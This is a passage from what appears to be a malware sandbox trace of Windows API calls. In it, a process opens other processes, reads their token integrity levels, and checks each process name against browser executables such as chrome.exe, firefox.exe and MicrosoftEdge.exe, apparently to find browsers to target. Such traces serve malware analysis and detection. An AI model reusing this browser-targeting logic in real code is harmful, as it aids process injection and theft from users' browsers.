TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.319] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.319] CloseHandle (hObject=0xb8) returned 1 [0237.319] CloseHandle (hObject=0xb4) returned 1 [0237.319] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.319] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.319] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.319] GetLastError () returned 0x7a [0237.319] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.319] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.319] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.319] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0237.319] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0237.319] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0237.319] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0237.319] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0237.319] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0237.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0237.320] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.320] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.320] GetLastError () returned 0x7a [0237.320] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.320] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.320] CloseHandle (hObject=0xb8) returned 1 [0237.320] CloseHandle (hObject=0xb4) returned 1 [0237.320] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.320] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.320] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.320] GetLastError () returned 0x7a [0237.320] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.320] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.320] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.320] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0237.320] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0237.320] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0237.320] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0237.320] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0237.320] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0237.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0237.320] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.320] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.320] GetLastError () returned 0x7a [0237.320] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.320] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.320] CloseHandle (hObject=0xb8) returned 1 [0237.320] CloseHandle (hObject=0xb4) returned 1 [0237.320] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.320] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.320] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.320] GetLastError () returned 0x7a [0237.320] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.321] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.321] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.321] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0237.321] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0237.321] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0237.321] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0237.321] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0237.321] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0237.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0237.321] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.321] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.321] GetLastError () returned 0x7a [0237.321] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.321] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.321] CloseHandle (hObject=0xb8) returned 1 [0237.321] CloseHandle (hObject=0xb4) returned 1 [0237.321] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.321] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.321] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.321] GetLastError () returned 0x7a [0237.321] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.321] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.321] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.321] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0237.321] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0237.321] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0237.321] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0237.321] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0237.321] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0237.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0237.321] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.321] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.321] GetLastError () returned 0x7a [0237.321] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.321] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.322] CloseHandle (hObject=0xb8) returned 1 [0237.322] CloseHandle (hObject=0xb4) returned 1 [0237.322] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.322] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.322] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.322] GetLastError () returned 0x7a [0237.322] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.322] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.322] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.322] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0237.322] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0237.322] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0237.322] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0237.322] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0237.322] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0237.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0237.322] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.322] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.322] GetLastError () returned 0x7a [0237.322] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.322] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.322] CloseHandle (hObject=0xb8) returned 1 [0237.322] CloseHandle (hObject=0xb4) returned 1 [0237.322] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.322] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.322] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.322] GetLastError () returned 0x7a [0237.322] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.322] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.322] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.322] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0237.322] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0237.322] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0237.322] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0237.322] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0237.323] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0237.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0237.323] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.323] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.323] GetLastError () returned 0x7a [0237.323] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.323] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.323] CloseHandle (hObject=0xb8) returned 1 [0237.323] CloseHandle (hObject=0xb4) returned 1 [0237.323] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.323] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.323] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.323] GetLastError () returned 0x7a [0237.323] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.323] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.323] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.323] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0237.323] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0237.323] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0237.323] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0237.323] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0237.323] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0237.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0237.323] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.323] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.323] GetLastError () returned 0x7a [0237.323] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.323] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.323] CloseHandle (hObject=0xb8) returned 1 [0237.323] CloseHandle (hObject=0xb4) returned 1 [0237.323] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.323] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.323] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.324] GetLastError () returned 0x7a [0237.324] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.324] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.324] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.324] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0237.324] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0237.324] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0237.324] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0237.324] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0237.324] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0237.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0237.324] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.324] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.324] GetLastError () returned 0x7a [0237.324] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.324] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.324] CloseHandle (hObject=0xb8) returned 1 [0237.324] CloseHandle (hObject=0xb4) returned 1 [0237.324] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.324] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.324] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.324] GetLastError () returned 0x7a [0237.324] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.324] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.324] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.324] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0237.324] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0237.324] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0237.324] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0237.324] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0237.324] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0237.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0237.324] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.324] GetTokenInformation (in: 